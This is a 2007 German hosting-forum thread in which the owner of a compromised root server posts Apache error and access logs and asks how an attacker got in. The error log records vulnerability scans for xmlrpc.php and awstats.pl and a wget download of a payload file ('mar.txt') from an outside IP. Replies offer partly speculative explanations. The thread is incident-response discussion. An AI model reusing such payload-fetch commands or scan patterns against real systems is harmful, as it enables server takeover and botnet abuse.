DOS-Attacke / Server gesperrt

elzschiko · Feb 18, 2007

Hallo,

ich habe einen Rootie bei 1und1 und der wurde mir am gestrigen Samstag früh gesperrt - mit der Begründung das er eine DDOS-Attacke auf einen anderen Server gestartet hätte.
Nach diversen Telefonaten wurde mir der Server im Rescue-Mode wieder freigeschalten.
Bei der Analyse der Log-Files bin ich im error.log vom Apache2 stutzig geworden. Kann mir jemand helfen bei der Interpretation bzw. Fehlerbehebung?
RKHunter habe ich duchlaufen lassen, hat keine rootkits gefunden.

Code:

[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/b2evo
[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/wordpress
[Thu Feb 15 22:48:09 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/phpgroupware
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/awstats.pl
[Thu Feb 15 23:09:45 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats.pl
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/awstats
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:46 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/cgi
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scripts
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/awstats
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:47 2007] [error] [client 66.70.213.90] script not found or unable to stat: /srv/www/vhosts/default/cgi-bin/stats
[Thu Feb 15 23:09:48 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/scgi-bin
[Thu Feb 15 23:09:48 2007] [error] [client 66.70.213.90] File does not exist: /srv/www/vhosts/default/htdocs/stats
[Fri Feb 16 01:29:13 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/a1b2c3d4e5f6g7h8i9
[Fri Feb 16 01:29:13 2007] [error] [client 82.216.202.246] script '/srv/www/vhosts/default/htdocs/adxmlrpc.php' not found or unable to stat
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/adserver
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpAdsNew
[Fri Feb 16 01:29:14 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpadsnew
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/phpads
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/Ads
[Fri Feb 16 01:29:15 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/ads
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] script '/srv/www/vhosts/default/htdocs/xmlrpc.php' not found or unable to stat
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/xmlrpc
[Fri Feb 16 01:29:16 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/xmlsrv
[Fri Feb 16 01:29:17 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/blog
[Fri Feb 16 01:29:17 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/drupal
[Fri Feb 16 01:29:19 2007] [error] [client 82.216.202.246] File does not exist: /srv/www/vhosts/default/htdocs/community
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
sh: /id: No such file or directory
perl: no process killed
--02:29:40--  http://80.15.6.81/mar.txt
           => `mar.txt'
Connecting to 80.15.6.81:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,668 (29K) [text/plain]

    0K .......... .......... ........                        100%   17.08 KB/s

02:29:42 (17.08 KB/s) - `mar.txt' saved [29668/29668]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  3 29668    3  1188    0     0   5582      0  0:00:05 --:--:--  0:00:05  5582  8 29668    8  2628    0     0   8850      0  0:00:03 --:--:--  0:00:03 16941
67 29668   67 19908    0     0  15049      0  0:00:01  0:00:01 --:--:-- 16864100 29668  100 29668    0     0  15547      0  0:00:01  0:00:01 --:--:-- 16792
[Fri Feb 16 02:46:08 2007] [error] [client 207.46.98.133] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt
[Fri Feb 16 02:46:08 2007] [error] [client 207.46.98.133] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt
[Fri Feb 16 02:46:09 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 02:46:09 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 03:03:00 2007] [error] [client 207.46.98.133] script '/srv/www/vhosts/default/htdocs/index.php' not found or unable to stat
[Fri Feb 16 04:11:05 2007] [error] [client 207.46.98.134] File does not exist: /srv/www/vhosts/default/htdocs/robots.txt

Vielen Dank im Voraus
Daniel

flyingoffice · Feb 18, 2007

Hallo!

Nun, ich würde sagen, da hat jemand Deinen Server nach möglichen Sicherheitlücken durchsucht und hat dann auch eine gefunden. Diese hat er genutzt, um schadhaften Code auf Deinen Server zu laden und auszuführen.

Gruß flyingoffice

elzschiko · Feb 18, 2007

Danke für die schnelle Antwort.
Das hab ich mir schon gedacht. Hast Du Tipps wie man rausbekommen kann welche Lücke er genutzt hat? Da dies ja über den Apache gekommen ist, müsste sich doch irgendwie rausfinden lassen, über welches Skript ihm das gelungen ist?

Grüsse
Daniel

flyingoffice · Feb 18, 2007

Hallo!

So auf dem ersten Blick nicht. Such doch mal nach der auf Deinen Server geladenen Datei mar.txt. Ich vermute, daß die in den gleichen Ordner geladen wurde, wo auch Dein Script mit Sicherheitlücke zu finden ist.

Gruß flyingoffice

elzschiko · Feb 18, 2007

Hallo,

das hab ich schon gemacht - aber nichts gefunden. Findet "find" auch versteckte Dateien?
Kannst Du erkennnen über welches Skript der Angriff ging?

Grüsse
Daniel

flyingoffice · Feb 18, 2007

Hallo!

elzschiko said:
Kannst Du erkennnen über welches Skript der Angriff ging?

Nein, sonnst hätte ich es Dir natürlich längst gesagt. Das ist ja ein Auszug aus dem error.log. Interessant wäre sicherlich ein Auszug aus dem access.log aus der gleichen Zeitspanne.

Gruß flyingoffice

Thomas81 · Feb 18, 2007

Hallo.
Über mar.txt. Das war das Scipt. Ein nettes Scipt. Hab es mir mal angeshenen. Schau mal bei http://twidle.atrix-team.org . Denn die haben etwas mit deinem Script zu tun. Denn denen ihr Name kommt in dem Script vor. Mehr kann ich dir nicht sagen. Denn mit so nem Kater kann man schlecht denken.

Bis dann.

elzschiko · Feb 18, 2007

Ok,

hier der Auszug aus dem Logfile:

Code:

File: access_log        Col 0              416890 bytes                                                                                                   95%
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //drupal/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //community/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:07 +0100] "GET //blogs/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:08 +0100] "GET //b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //wordpress/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:22:48:09 +0100] "GET //phpgroupware/xmlrpc.php HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:45 +0100] "GET //awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:45 +0100] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //scgi-bin/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //scgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:46 +0100] "GET //cgi/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scgi/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scripts/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //scgi-bin/awstats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:47 +0100] "GET //cgi-bin/stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:48 +0100] "GET //scgi-bin/stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.70.213.90 - - [15/Feb/2007:23:09:48 +0100] "GET //stats/awstats.pl HTTP/1.1" 404 1058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
195.136.80.67 - - [15/Feb/2007:23:43:20 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.136.80.67 - - [15/Feb/2007:23:43:27 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.136.80.67 - - [15/Feb/2007:23:43:28 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
72.14.220.136 - - [15/Feb/2007:23:55:51 +0100] "GET /index.php?bereich=collection&seite=1&unterseite=11 HTTP/1.0" 301 388 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0; Google Wireless Transcoder;)"
83.133.125.202 - - [16/Feb/2007:00:07:53 +0100] "GET / HTTP/1.1" 301 336 "http://www.ottosuch.de/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.
1; de)"
84.19.187.129 - - [16/Feb/2007:01:07:07 +0100] "GET / HTTP/1.0" 200 266 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:13 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:13 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:14 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:15 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:16 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:17 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:17 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
82.216.202.246 - - [16/Feb/2007:01:29:19 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 1052 "-" "-"
207.46.98.133 - - [16/Feb/2007:02:46:08 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:08 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:09 +0100] "GET /index.php?nav1=contact&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:02:46:09 +0100] "GET /index.php?nav1=referenzen&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)
"
207.46.98.133 - - [16/Feb/2007:03:03:00 +0100] "GET /index.php?nav1=schreib&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
87.118.105.74 - - [16/Feb/2007:03:25:25 +0100] "GET / HTTP/1.0" 200 266 "-" "-"
207.46.98.134 - - [16/Feb/2007:04:11:05 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.134 - - [16/Feb/2007:04:11:06 +0100] "GET /index.php?nav1=buero&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.135 - - [16/Feb/2007:05:58:14 +0100] "GET /robots.txt HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.135 - - [16/Feb/2007:05:58:15 +0100] "GET /index.php?nav1=kurier&lang=de HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.133 - - [16/Feb/2007:06:27:20 +0100] "GET /index.php HTTP/1.0" 404 1066 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"

Thomas81 · Feb 18, 2007

So.
Hab doch noch mal drauf gesschaut. Glaube ich weis wie es passiert ist.

1. Der Angreifer hatte Shell-Zugang. Vieleicht Passwort zu unsicher.
2. Der Angreifer startete ein Script.
3. Das war aber schon was länger her. Da die Person wahrscheinlich mehrere Server gehackt hatte. Und dann die DOS erst später gestartet hatte als alle Server vorbereitete waren.
4. Durch ein Script wurde eine Verbindung zu Atrix Team aufgebaut. Von allen Servern.
5. Von dort wurden alle Server über den "Service"^^ MyBox auf der Seite von Atrix Team gesteuert.

elzschiko · Feb 19, 2007

hallo,

so - server wurde neu aufgesetzt.
rkhunter gibt mir folgende warnungen:

Code:

Application advisories
* Application scan
   Checking Apache2 modules ...                               [ Not found ]
   Checking Apache configuration ...                          [ OK ]

* Application version scan
   - GnuPG                                               [ Vulnerable ]
   - Bind DNS                                            [ OK ]
   - OpenSSL                                            [ Vulnerable ]
   - PHP                                               [ Vulnerable ]
   - Procmail MTA                                         [ OK ]
   - ProFTPd                                            [ OK ]
   - OpenSSH                                             [ OK ]



Security advisories
* Check: Groups and Accounts
   Searching for /etc/passwd...                               [ Found ]
   Checking users with UID '0' (root)...                      [ OK ]

* Check: SSH
   Searching for sshd_config...
   Found /etc/ssh/sshd_config
   Checking for allowed root login...                         [ OK (Remote root login disabled) ]
   Checking for allowed protocols...                          [ OK (Only SSH2 allowed) ]

* Check: Events and Logging
   Search for syslog configuration...                         [ OK ]
   Checking for running syslog slave...                       [ OK ]
   Checking for logging to remote system...                   [ OK (no remote logging) ]

[Press <ENTER> to continue]



---------------------------- Scan results ----------------------------

MD5 scan
Scanned files: 0
Incorrect MD5 checksums: 0

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 3

Scanning took 73 seconds

Kann mir jemand behilflich sein und php,gnupg und openssl auf eine sicherere version updaten?

ich habe einen rootserver von 1und1, Suse9.3_64Bit; Plesk8.1.0

Danke
Daniel

Darkdream · Feb 19, 2007

Ich weiß leider nicht wie aktuell die Pakete sind, aber hast du schon versucht über Yast upzudaten? Wenn nicht dann kompiliere dir die Pakete einfach neu.

elzschiko · Feb 19, 2007

habe online-update schon ausgeführt. kann man den stand der den yast bietet als "halbwegs" sicher durchgehen lassen? die versionen der angemeckerten programme kann ich dir die versionsstände gern per pm schicken

DOS-Attacke / Server gesperrt

elzschiko

New Member

flyingoffice

Guest

elzschiko

New Member

flyingoffice

Guest

elzschiko

New Member

flyingoffice

Guest

Thomas81

Registered User

elzschiko

New Member

Thomas81

Registered User

elzschiko

New Member

Darkdream

Registered User

elzschiko

New Member

We value your privacy